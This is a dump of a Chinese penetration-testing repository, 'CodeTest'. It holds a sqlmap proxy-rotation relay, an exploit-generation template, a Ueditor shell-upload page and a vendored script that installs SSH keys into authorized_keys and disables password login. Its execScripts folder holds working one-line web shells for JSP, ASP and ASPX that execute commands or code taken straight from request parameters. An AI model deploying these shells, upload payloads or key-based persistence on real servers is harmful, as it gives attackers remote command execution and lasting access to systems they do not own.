"152.136.62.181:9999", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"} 5 | {"proxy": "183.247.207.225:30001", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"} 6 | -------------------------------------------------------------------------------- /Proxy/log/Apache Shiro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/Apache Shiro -------------------------------------------------------------------------------- /Proxy/log/test.log: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/test.log -------------------------------------------------------------------------------- /Proxy/proxySetting.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: setting.py 5 | Description : 配置文件 6 | Author : JHao 7 | date: 2019/2/15 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/2/15: 11 | ------------------------------------------------- 12 | """ 13 | 14 | BANNER = r""" 15 | **************************************************************** 16 | *** ______ ********************* ______ *********** _ ******** 17 | *** | ___ \_ ******************** | ___ \ ********* | | ******** 18 | *** | |_/ / \__ __ __ _ __ _ | |_/ /___ * ___ | | ******** 19 | *** | __/| _// _ \ \ \/ /| | | || __// _ \ / _ \ | | ******** 20 | *** | | | | | (_) | > < \ |_| || | | (_) | (_) || |___ **** 21 | *** \_| |_| \___/ /_/\_\ \__ |\_| \___/ \___/ \_____/ **** 22 | **** __ / / ***** 23 | ************************* /___ / ******************************* 24 | ************************* ******************************** 25 | **************************************************************** 26 | """ 27 | 28 | VERSION = "2.3.0" 29 | 30 | # ############### server config ############### 31 | #HOST = "0.0.0.0" 32 | 33 | #PORT = 5010 34 | 35 | # ############### database config ################### 36 | # db connection uri 37 | # example: 38 | # Redis: redis://:password@ip:port/db 39 | # Ssdb: ssdb://:password@ip:port 40 | #DB_CONN = 'redis://:pwd@127.0.0.1:6379/0' 41 | 42 | # proxy table name 43 | #TABLE_NAME = 'use_proxy' 44 | 45 | 46 | # ###### config the proxy fetch function ###### 47 | #PROXY_FETCHER = [ 48 | # "freeProxy01", 49 | # "freeProxy02", 50 | # "freeProxy03", 51 | # # "freeProxy04", 52 | # "freeProxy05", 53 | # 
"freeProxy06", 54 | # "freeProxy07", 55 | # "freeProxy08", 56 | # "freeProxy09", 57 | # "freeProxy13", 58 | # "freeProxy14" 59 | #] 60 | 61 | # ############# proxy validator ################# 62 | # 代理验证目标网站 63 | HTTP_URL = "http://httpbin.org/ip" 64 | 65 | HTTPS_URL = "https://httpbin.org/ip" 66 | 67 | # 代理验证时超时时间 68 | VERIFY_TIMEOUT = 5 69 | 70 | # 近PROXY_CHECK_COUNT次校验中允许的最大失败次数,超过则剔除代理 71 | MAX_FAIL_COUNT = 0 72 | 73 | # 近PROXY_CHECK_COUNT次校验中允许的最大失败率,超过则剔除代理 74 | # MAX_FAIL_RATE = 0.1 75 | 76 | # proxyCheck时代理数量少于POOL_SIZE_MIN触发抓取 77 | POOL_SIZE_MIN = 20 78 | 79 | # ############# scheduler config ################# 80 | 81 | # Set the timezone for the scheduler forcely (optional) 82 | # If it is running on a VM, and 83 | # "ValueError: Timezone offset does not match system offset" 84 | # was raised during scheduling. 85 | # Please uncomment the following line and set a timezone for the scheduler. 86 | # Otherwise it will detect the timezone from the system automatically. 87 | 88 | TIMEZONE = "Asia/Shanghai" -------------------------------------------------------------------------------- /Proxy/sqlmap_auto_proxy.bat: -------------------------------------------------------------------------------- 1 | python3 sqlmap_auto_proxy.py 2 | pause -------------------------------------------------------------------------------- /Proxy/sqlmap_auto_proxy.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # from hutaow 3 | import sys 4 | import socket 5 | import logging 6 | import threading 7 | import random 8 | import json 9 | local_ip = '127.0.0.1' 10 | local_port = 9999 11 | PKT_BUFF_SIZE = 2048 12 | logger = logging.getLogger("Proxy Logging") 13 | formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',) 14 | stream_handler = logging.StreamHandler(sys.stderr) 15 | stream_handler.setFormatter(formatter) 16 | logger.addHandler(stream_handler) 
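logger.setLevel(logging.DEBUG)


def _peer_name(sock):
    """Return ``sock.getpeername()`` for log lines, or ``'?'`` once the peer is gone."""
    try:
        return sock.getpeername()
    except OSError:
        return '?'


def tcp_mapping_worker(conn_receiver, conn_sender):
    """Relay bytes from ``conn_receiver`` to ``conn_sender`` until either side ends.

    One worker thread runs per direction. The loop stops on a recv error, an
    empty read (peer closed) or a send error; both sockets are then closed,
    which makes the opposite-direction worker see ``fileno() == -1`` and stop
    too. A socket already closed by the sibling worker is detected up front.

    Args:
        conn_receiver: connected socket to read from.
        conn_sender: connected socket to write to.
    """
    while True:
        if conn_receiver.fileno() == -1 or conn_sender.fileno() == -1:
            logger.debug('Socket has closed. ')
            return
        try:
            data = conn_receiver.recv(PKT_BUFF_SIZE)
        except Exception as e:
            logger.debug('Connection closed. %s' % e)
            break
        if not data:
            logger.info('No more data is received.')
            break
        try:
            conn_sender.sendall(data)
        except Exception as e:
            logger.error('Failed sending data. %s' % e)
            break
        # getpeername() raises once a peer has gone away; a log line must not
        # kill the thread before the sockets below are closed.
        logger.info('Mapping > %s -> %s > %d bytes.' % (_peer_name(conn_receiver), _peer_name(conn_sender), len(data)))
    conn_receiver.close()
    conn_sender.close()
    return


def tcp_mapping_request(local_conn, remote_ip, remote_port):
    """Connect to an upstream proxy and start the two relay workers.

    The same ``remote_ip:remote_port`` is retried ``retry_count`` times; after
    that another entry is drawn at random from the module-level proxy list
    ``a``, up to ``retry_sock`` times. When every attempt fails ``local_conn``
    is closed and nothing is relayed.

    Args:
        local_conn: accepted client socket.
        remote_ip: upstream proxy host to try first.
        remote_port: upstream proxy port to try first.
    """
    # how many times to switch to a different proxy address
    retry_sock = 2
    # retries allowed for a single address
    retry_count = 1
    while True:
        remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # NOTE(review): this 2 s timeout also applies to recv() on the
            # socket after connect (it is never reset) -- confirm intended.
            remote_conn.settimeout(2)
            remote_conn.connect((remote_ip, remote_port))
        except Exception:
            # A fresh socket is created on every attempt, so close the failed
            # one here or each retry leaks a descriptor.
            remote_conn.close()
            if retry_count > 0:
                logger.error('Unable to connect to the remote server. Number of retries remaining %s' % retry_count)
                retry_count -= 1
                continue
            elif retry_sock > 0:
                # reset the per-address retry budget and move to another proxy
                retry_count = 1
                retry_sock -= 1
                proxyip = random.choice(a)
                print("[!]Switch proxy ip:" + str(proxyip))
                remote_ip = proxyip[0]
                remote_port = proxyip[1]
                continue
            else:
                # the proxy list is unreliable; give up on this client
                logger.info('Proxy is not stability.')
                local_conn.close()
                return

        threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()
        threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()
        return


def Loadips(path='ips.txt'):
    """Read ``(ip, port)`` tuples from a JSON-lines proxy file.

    Each non-blank line is expected to be a JSON object whose ``"proxy"`` value
    has the form ``"ip:port"`` (the format of ips.txt). Lines that are not
    valid JSON, or that carry no usable ``ip:port``, are logged and skipped.

    Args:
        path: file to read; defaults to ``ips.txt`` in the working directory.

    Returns:
        A list of ``(ip, port)`` tuples with ``port`` as an int.

    Raises:
        OSError: if ``path`` cannot be opened.
    """
    ip_list = []
    with open(path) as ips:
        for line in ips:
            line = line.strip()
            if not line:
                continue
            try:
                entry = json.loads(line)
            except ValueError:
                logger.warning('Skipping malformed line in %s: %r', path, line)
                continue
            proxy = entry.get("proxy", "") if isinstance(entry, dict) else ""
            host, sep, port = proxy.rpartition(":")
            if not sep or not host or not port.isdigit():
                logger.warning('Skipping entry without a usable ip:port in %s: %r', path, line)
                continue
            # int(), not eval(): ips.txt is data and must never be executed.
            ip_list.append((host, int(port)))
    return ip_list


a = Loadips()

if __name__ == '__main__':
    print(a)
    if not a:
        # random.choice() on an empty list would only fail after the first
        # client connects; refuse to start instead.
        logger.error('No proxies loaded from ips.txt, nothing to relay through.')
        sys.exit(1)
    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # local_ip is loopback; clients are accepted without any authentication.
    local_server.bind((local_ip, local_port))
    local_server.listen(5)
    logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
    while True:
        try:
            (local_conn, local_addr) = local_server.accept()
            proxyip = random.choice(a)
            print("[!]Now proxy ip:" + str(proxyip))
            prip = proxyip[0]
            prpo = proxyip[1]
        except Exception:
            local_server.close()
            logger.debug('Stop mapping service.')
            break
        threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
        logger.debug('Receive mapping request from %s:%d.' % local_addr)
-------------------------------------------------------------------------------- /Proxy/util/__init__.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name:   __init__
   Description :
   Author :  JHao
   date:  2020/7/6
-------------------------------------------------
   Change Activity:
                   2020/7/6:
-------------------------------------------------
"""
__author__ = 'JHao'
-------------------------------------------------------------------------------- /Proxy/util/lazyProperty.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name:   lazyProperty
   Description :
   Author :  JHao
   date:  2016/12/3
-------------------------------------------------
   Change Activity:
                   2016/12/3:
-------------------------------------------------
"""
__author__ = 'JHao'


class LazyProperty(object):
    """
    LazyProperty
    explain: http://www.spiderpy.cn/blog/5/

    Non-data descriptor (only ``__get__`` is defined): the wrapped function is
    called on first attribute access and its result is stored on the instance
    under the function's name, so later accesses bypass the descriptor.
    Access through the class returns the descriptor itself.
    """

    def __init__(self, func):
        self.func = func

    def __get__(self, instance, owner):
        if instance is None:
            return self
        value = self.func(instance)
        # The instance attribute shadows this descriptor only because no
        # __set__ is defined; that is what makes the cache stick.
        setattr(instance, self.func.__name__, value)
        return value
-------------------------------------------------------------------------------- /Proxy/util/singleton.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name:   singleton
   Description :
   Author :  JHao
   date:  2016/12/3
-------------------------------------------------
   Change Activity:
                   2016/12/3:
-------------------------------------------------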
""" 13 | __author__ = 'JHao' 14 | 15 | 16 | class Singleton(type): 17 | """ 18 | Singleton Metaclass 19 | """ 20 | 21 | _inst = {} 22 | 23 | def __call__(cls, *args, **kwargs): 24 | if cls not in cls._inst: 25 | cls._inst[cls] = super(Singleton, cls).__call__(*args) 26 | return cls._inst[cls] 27 | -------------------------------------------------------------------------------- /Proxy/util/six.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: six 5 | Description : 6 | Author : JHao 7 | date: 2020/6/22 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2020/6/22: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | import sys 16 | 17 | PY2 = sys.version_info[0] == 2 18 | PY3 = sys.version_info[0] == 3 19 | 20 | if PY3: 21 | def iteritems(d, **kw): 22 | return iter(d.items(**kw)) 23 | else: 24 | def iteritems(d, **kw): 25 | return d.iteritems(**kw) 26 | 27 | if PY3: 28 | from urllib.parse import urlparse 29 | else: 30 | from urlparse import urlparse 31 | 32 | if PY3: 33 | from imp import reload as reload_six 34 | else: 35 | reload_six = reload 36 | 37 | if PY3: 38 | from queue import Empty, Queue 39 | else: 40 | from Queue import Empty, Queue 41 | 42 | 43 | def withMetaclass(meta, *bases): 44 | """Create a base class with a metaclass.""" 45 | 46 | # This requires a bit of explanation: the basic idea is to make a dummy 47 | # metaclass for one level of class instantiation that replaces itself with 48 | # the actual metaclass. 
49 | class MetaClass(meta): 50 | 51 | def __new__(cls, name, this_bases, d): 52 | return meta(name, bases, d) 53 | 54 | return type.__new__(MetaClass, 'temporary_class', (), {}) 55 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Welcome to CodeTest

2 | 3 | ### :point_right:关于本项目 4 | 5 | >本项目的主要目的: 针对日常收集的Python POC\EXP测试脚本,使用可视化界面统一执行入口,方便运行。 6 | > 7 | >本项目适合人群: 有Python基础的渗透测试人员(工具自带简易编辑器,可修改脚本内参数,重新加载后可灵活使用脚本进行测试) 8 | > 9 | >可视化界面开发库: Tkinter 10 | > 11 | >python版本: 3.5+ 12 | 13 | ### :bulb:POC\EXP 参考链接 14 | 15 | ``` 16 | https://github.com/Ascotbe/Medusa 17 | https://github.com/zhzyker/vulmap 18 | https://github.com/Python3WebSpider/ProxyPool 19 | ``` 20 | 21 | 22 | ### :book:使用说明 23 | 24 | ``` 25 | (一)下载文件 26 | git clone https://github.com/codeyso/CodeTest.git 27 | cd CodeTest 28 | 29 | (二)安装依赖 30 | pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 31 | 注意: ~\Python3\Lib\site-packages,找到这个路径,下面有一个文件夹叫做crypto,将小写c改成大写C 32 | 注意: 建议安装之前更新pip (python -m pip install --upgrade pip) 33 | 34 | (三)使用工具 35 | 1) 双击 CodeTest.bat 36 | 2) pythonw3 -B CodeTest.pyw 37 | 38 | (四)备注: 如果GitHub图片显示不出来,修改hosts 39 | C:\Windows\System32\drivers\etc\hosts 40 | 41 | 在文件末尾添加 42 | # GitHub Start 43 | 192.30.253.112 Build software better, together 44 | 192.30.253.119 gist.github.com 45 | 151.101.184.133 assets-cdn.github.com 46 | 151.101.184.133 raw.githubusercontent.com 47 | 151.101.184.133 gist.githubusercontent.com 48 | 151.101.184.133 cloud.githubusercontent.com 49 | 151.101.184.133 camo.githubusercontent.com 50 | 151.101.184.133 avatars0.githubusercontent.com 51 | 151.101.184.133 avatars1.githubusercontent.com 52 | 151.101.184.133 avatars2.githubusercontent.com 53 | 151.101.184.133 avatars3.githubusercontent.com 54 | 151.101.184.133 avatars4.githubusercontent.com 55 | 151.101.184.133 avatars5.githubusercontent.com 56 | 151.101.184.133 avatars6.githubusercontent.com 57 | 151.101.184.133 avatars7.githubusercontent.com 58 | 151.101.184.133 avatars8.githubusercontent.com 59 | 60 | # GitHub End 61 | ``` 62 | 63 | 64 | ### :checkered_flag:模板 65 | #### POC 66 | 67 | ``` 68 | def check(**kwargs): 69 | url = kwargs['url']#/*str*/ 70 | print('输出结果') 71 | print(url) 72 | '''此处的返回状态码用于批量验证 73 | if True: 74 | return 
1 75 | else: 76 | return 77 | ''' 78 | ``` 79 | 80 | 81 | #### EXP 82 | 83 | ``` 84 | 有专用的EXP生成界面 85 | ``` 86 | 87 | 88 | ### :clipboard:功能界面 89 | #### 漏洞扫描界面 90 | ![漏洞扫描界面](https://github.com/codeyso/CodeTest/blob/main/img/1.png "漏洞扫描界面") 91 | 92 | #### 漏洞利用界面 93 | ![漏洞利用界面](https://github.com/codeyso/CodeTest/blob/main/img/2.png "漏洞利用界面") 94 | 95 | ### :open_file_folder:使用示例 96 | >案例参考:https://mp.weixin.qq.com/s/xwh81ZeE0Lgx-iIpqZI1_g 97 | 98 | -------------------------------------------------------------------------------- /Template/EXP.j2: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | import prettytable as pt 4 | """ 5 | import util.globalvar as GlobalVar 6 | from ClassCongregation import ysoserial_payload,Dnslog 7 | DL = Dnslog() 8 | DL.dns_host() 9 | DL.result() 10 | """ 11 | class {{service.entry_nodes.vulname}}(): 12 | def __init__(self, **env): 13 | """ 14 | 基础参数初始化 15 | """ 16 | self.url = env.get('url') 17 | self.cookie = env.get('cookie') 18 | self.cmd = env.get('cmd') 19 | self.pocname = env.get('pocname') 20 | self.vuln = env.get('vuln') 21 | self.timeout = int(env.get('timeout')) 22 | self.retry_time = int(env.get('retry_time')) 23 | self.retry_interval = int(env.get('retry_interval')) 24 | self.status = env.get('status') 25 | 26 | def {{service.entry_nodes.cvename}}(self): 27 | appName = '{{service.entry_nodes.vulname}}' 28 | pocname = '{{service.entry_nodes.cvename}}' 29 | path = '{{service.header_nodes.headinfo.path}}' 30 | method = '{{service.header_nodes.headinfo.method}}' 31 | desc = '{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}' 32 | data = '{{service.header_nodes.content.data}}' 33 | headers = {{service.header_nodes.headinfo.header}} 34 | #输出类 35 | output = Output(pocname) 36 | #请求类 37 | exprequest = ExpRequest(pocname, output) 38 | try: 39 | if self.vuln == 'False': 40 | r = 
exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False) 41 | {{service.entry_nodes.condition}} 42 | self.status = 'success' 43 | output.no_echo_success(method, desc) 44 | else: 45 | output.fail() 46 | else: 47 | result = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text 48 | print(result) 49 | except Exception as error: 50 | output.error_output(str(error)) 51 | 52 | tb = pt.PrettyTable() 53 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description'] 54 | tb.align['Target type'] = 'l' 55 | tb.align['Vuln Name'] = 'l' 56 | tb.align['Impact Version && Vulnerability description'] = 'l' 57 | tb.add_row([ 58 | "{{service.entry_nodes.vulname}}", 59 | "{{service.entry_nodes.cvename}}", 60 | "{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}" 61 | ]) 62 | print(tb) 63 | 64 | def check(**kwargs): 65 | result_list = [] 66 | result_list.append('----------------------------') 67 | Exp{{service.entry_nodes.vulname}} = {{service.entry_nodes.vulname}}(**kwargs) 68 | if kwargs['pocname'] != 'ALL': 69 | func = getattr(Exp{{service.entry_nodes.vulname}}, kwargs['pocname'])#返回对象函数属性值,可以直接调用 70 | func()#调用函数 71 | return Exp{{service.entry_nodes.vulname}}.status 72 | else:#调用所有函数 73 | for func in dir({{service.entry_nodes.vulname}}): 74 | if not func.startswith("__"): 75 | methodcaller(func)(Exp{{service.entry_nodes.vulname}}) 76 | result_list.append(func+' -> '+Exp{{service.entry_nodes.vulname}}.status) 77 | Exp{{service.entry_nodes.vulname}}.status = 'fail' 78 | result_list.append('----------------------------') 79 | return '\n'.join(result_list) -------------------------------------------------------------------------------- /Template/POC.j2: 
-------------------------------------------------------------------------------- 1 | from ClassCongregation import color 2 | 3 | def check(**kwargs): 4 | url = kwargs['url']#/*str*/ 5 | print('输出结果') 6 | print(url) 7 | ''' 8 | if True: 9 | return 1 10 | else: 11 | return 12 | ''' -------------------------------------------------------------------------------- /Template/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Template/__init__.py -------------------------------------------------------------------------------- /data/api-docs.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/data/api-docs.json -------------------------------------------------------------------------------- /data/bool_blind.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | > 24 | -------------------------------------------------------------------------------- /data/error.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /data/time_blind.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | > 13 | 
-------------------------------------------------------------------------------- /execScripts/Caidao_cmd.jsp: -------------------------------------------------------------------------------- 1 | <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> -------------------------------------------------------------------------------- /execScripts/Caidao_shell.asp: -------------------------------------------------------------------------------- 1 | <%execute(request("value"))%> -------------------------------------------------------------------------------- /execScripts/Caidao_shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> -------------------------------------------------------------------------------- /execScripts/Caidao_shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/1.png -------------------------------------------------------------------------------- /img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/2.png -------------------------------------------------------------------------------- /lib/green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/green.png -------------------------------------------------------------------------------- /lib/note.txt: -------------------------------------------------------------------------------- 1 | #此处存放临时数据 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 
693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 | 728 | 729 | 730 | 731 | 732 | 733 | 734 | 735 | 736 | 737 | 738 | 739 | 740 | 741 | 742 | 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 | 771 | 772 | 773 | 774 | 775 | 776 | 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | 807 | 808 | 809 | 810 | 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 825 | 826 | 827 | 828 | 829 | 830 | 831 | 832 | 833 | 834 | 835 | 836 | 837 | 838 | 839 | 840 | 841 | 842 | 843 | 844 | 845 | 846 | 847 | 848 | 849 | 850 | 851 | 852 | 853 | 854 | 855 | 856 | 857 | 858 | 859 | 860 | 861 | 862 | 863 | 864 | 865 | 866 | 867 | 868 | 869 | 870 | 871 | 872 | 873 | 874 | 875 | 876 | 877 | 878 | 879 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 898 | 899 | 900 | 901 | 902 | 903 | 904 | 905 | 906 | 907 | 908 | 909 | 910 | 911 | 912 | 913 | 914 | 915 | 916 | 917 | 918 | 919 | 920 | 921 | 922 | 923 | 924 | 925 | 926 | 927 | 928 | 929 | 930 | 931 | 932 | 933 | 934 | 935 | 936 | 937 | 938 | 939 | 940 | 941 | 942 | 943 | 944 | 945 | 946 | 947 | 948 | 949 | 950 | 951 | 952 | 953 | 954 | 955 | 956 | 957 | 958 | 959 | 960 | 961 | 962 | 963 | 964 | 965 | -------------------------------------------------------------------------------- /lib/red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/red.png -------------------------------------------------------------------------------- 
/log/info.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/log/info.txt -------------------------------------------------------------------------------- /payload_html/Ueditor/Ueditor.html: -------------------------------------------------------------------------------- 1 |
2 | 3 |

shell addr: http://**.**.**.**/cest.png?.aspx

4 | 5 | 6 | 7 |
-------------------------------------------------------------------------------- /payload_html/Ueditor/ueditor.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/Ueditor/ueditor.png
-------------------------------------------------------------------------------- /payload_html/chrome_payload.html: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /payload_html/key.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
#=============================================================
# https://github.com/P3TERX/SSH_Key_Installer
# Description: Install SSH keys via GitHub, URL or local files
# Version: 2.7
# Author: P3TERX
# Blog: https://p3terx.com
#=============================================================
#
# Vendored copy of the upstream installer. Each option is acted on as soon
# as getopts reaches it (see the loop at the bottom), so option order matters.
# NOTE(review): the script's observable effects are an entry written to
# ${HOME}/.ssh/authorized_keys and edits to sshd_config ("Port ...",
# "PasswordAuthentication no"), followed by an sshd restart on systemd hosts.

VERSION=2.7
RED_FONT_PREFIX="\033[31m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
FONT_COLOR_SUFFIX="\033[0m"
INFO="[${LIGHT_GREEN_FONT_PREFIX}INFO${FONT_COLOR_SUFFIX}]"    # green "[INFO]" tag, printed with echo -e
ERROR="[${RED_FONT_PREFIX}ERROR${FONT_COLOR_SUFFIX}]"         # red "[ERROR]" tag, printed with echo -e
# Prefix privileged commands (sed on /etc/ssh/sshd_config, systemctl) with
# sudo when not running as root; SUDO stays unset for root.
[ $EUID != 0 ] && SUDO=sudo

# Print the option summary. Mirrors the getopts string "og:u:f:p:d" below.
USAGE() {
    echo "
SSH Key Installer $VERSION

Usage:
bash <(curl -fsSL git.io/key.sh) [options...]

Options:
-o Overwrite mode, this option is valid at the top
-g Get the public key from GitHub, the arguments is the GitHub ID
-u Get the public key from the URL, the arguments is the URL
-f Get the public key from the local file, the arguments is the local file path
-p Change SSH port, the arguments is port number
-d Disable password login"
}

# No options at all: show usage and fail.
if [ $# -eq 0 ]; then
    USAGE
    exit 1
fi

# Fetch https://github.com/<KEY_ID>.keys into PUB_KEY, prompting for the
# account when KEY_ID is empty. Exits 1 when the body is literally
# "Not Found" (unknown account) or empty (account has no keys).
get_github_key() {
    if [ "${KEY_ID}" == '' ]; then
        read -e -p "Please enter the GitHub account:" KEY_ID
        [ "${KEY_ID}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1
    fi
    echo -e "${INFO} The GitHub account is: ${KEY_ID}"
    echo -e "${INFO} Get key from GitHub..."
    # curl -f suppresses the body on HTTP errors, so an unknown account
    # typically yields an empty PUB_KEY and lands in the second branch.
    PUB_KEY=$(curl -fsSL https://github.com/${KEY_ID}.keys)
    if [ "${PUB_KEY}" == 'Not Found' ]; then
        echo -e "${ERROR} GitHub account not found."
        exit 1
    elif [ "${PUB_KEY}" == '' ]; then
        echo -e "${ERROR} This account ssh key does not exist."
        exit 1
    fi
}

# Download PUB_KEY from KEY_URL, prompting when it is empty. No content
# check happens here; install_key rejects an empty result.
# NOTE(review): ${KEY_URL} is unquoted in the curl call, so a URL containing
# spaces or glob characters is word-split/expanded before curl sees it.
get_url_key() {
    if [ "${KEY_URL}" == '' ]; then
        read -e -p "Please enter the URL:" KEY_URL
        [ "${KEY_URL}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1
    fi
    echo -e "${INFO} Get key from URL..."
    PUB_KEY=$(curl -fsSL ${KEY_URL})
}

# Read PUB_KEY from the local file KEY_PATH, prompting when it is empty.
# NOTE(review): "$(${KEY_PATH})" in the echo below executes the path as a
# command instead of printing it; the intended text was presumably
# "${KEY_PATH}". ${KEY_PATH} is also unquoted in the cat call. The
# misspelled name "loacl" is matched by the getopts dispatch below, so a
# rename must touch both sites.
get_loacl_key() {
    if [ "${KEY_PATH}" == '' ]; then
        read -e -p "Please enter the path:" KEY_PATH
        [ "${KEY_PATH}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1
    fi
    echo -e "${INFO} Get key from $(${KEY_PATH})..."
    PUB_KEY=$(cat ${KEY_PATH})
}

# Write PUB_KEY into ${HOME}/.ssh/authorized_keys: overwrite when
# OVERWRITE=1 (set by -o), otherwise append. Creates the directory and file
# first if missing, then fixes their modes (700 / 600).
# NOTE(review): the "Failed to create SSH key file." branch only prints and
# falls through to the redirection; it does not exit. The final check
# greps for PUB_KEY as a regular expression, and echo -e interprets
# backslash escapes in the key text, so unusual key contents may be written
# yet fail the check.
install_key() {
    [ "${PUB_KEY}" == '' ] && echo "${ERROR} ssh key does not exist." && exit 1
    if [ ! -f "${HOME}/.ssh/authorized_keys" ]; then
        echo -e "${INFO} '${HOME}/.ssh/authorized_keys' is missing..."
        echo -e "${INFO} Creating ${HOME}/.ssh/authorized_keys..."
        mkdir -p ${HOME}/.ssh/
        touch ${HOME}/.ssh/authorized_keys
        if [ ! -f "${HOME}/.ssh/authorized_keys" ]; then
            echo -e "${ERROR} Failed to create SSH key file."
        else
            echo -e "${INFO} Key file created, proceeding..."
        fi
    fi
    if [ "${OVERWRITE}" == 1 ]; then
        echo -e "${INFO} Overwriting SSH key..."
        echo -e "${PUB_KEY}\n" >${HOME}/.ssh/authorized_keys
    else
        echo -e "${INFO} Adding SSH key..."
        echo -e "\n${PUB_KEY}\n" >>${HOME}/.ssh/authorized_keys
    fi
    chmod 700 ${HOME}/.ssh/
    chmod 600 ${HOME}/.ssh/authorized_keys
    # Verify by grepping the key back out of the file. `A && B || C` runs C
    # when either A or B fails.
